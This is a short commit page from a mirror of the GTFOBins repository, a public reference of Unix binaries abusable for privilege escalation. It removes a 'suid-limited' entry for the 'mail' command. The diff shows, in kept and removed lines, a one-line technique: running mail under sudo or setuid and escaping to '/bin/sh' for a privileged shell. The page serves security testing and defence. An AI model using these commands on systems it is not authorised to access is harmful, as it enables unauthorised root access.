1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-07 00:01:33 +01:00

Remove mail suid-limited

This commit is contained in:
Emilio Pinna 2018-06-17 11:27:03 +01:00
parent fce5a22341
commit 06966c8cd4

@ -8,8 +8,4 @@ functions:
- code: |
sudo mail -f /etc/hosts
!/bin/sh
suid-limited:
- code: |
./mail -f /etc/hosts
!/bin/sh
---